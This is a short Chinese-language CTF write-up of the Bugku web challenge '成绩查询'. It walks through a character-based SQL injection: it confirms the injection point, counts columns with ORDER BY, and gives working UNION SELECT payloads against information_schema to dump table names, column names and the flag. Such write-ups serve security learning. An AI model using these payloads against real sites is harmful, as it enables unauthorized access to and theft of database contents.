Bugku web-成绩查询

根据题目可以推断此题应该和查询有关（不愧是我φ(≧ω≦*)♪），环境启动。

先随便输点数据，看这样子应该有四列。

接着判断注入点，输入1有回显，输入1'无回显，可知存在字符型注入。

下一步，用order by 来确定列数。可以发现当输入1' order by 4 -- 有回显，而1' order by 5 -- 无回显，确定查询列数为4，即后面的select语句要有四个参数。

确定好参数，我们就可以来查询数据库里的表名了，这里要注意的是我们要采用-1'来闭合，主要是为了让回显处能显示我们的查询语句返回值，而不是莫名其妙的成绩单。

具体语句如下：-1'union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() -- 

可以得到fl4g,sc两张表，明显，我们所需的表应该是fl4g，下一步，获取表中的所有字段。具体语句如下：-1'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g' --

再然后就是看这个字段的具体值啦φ(≧ω≦*)♪，朴实无华的查询语句即可：-1' union select 1,2,3,skctf_flag from fl4g --

最后，启动环境要的金币太多了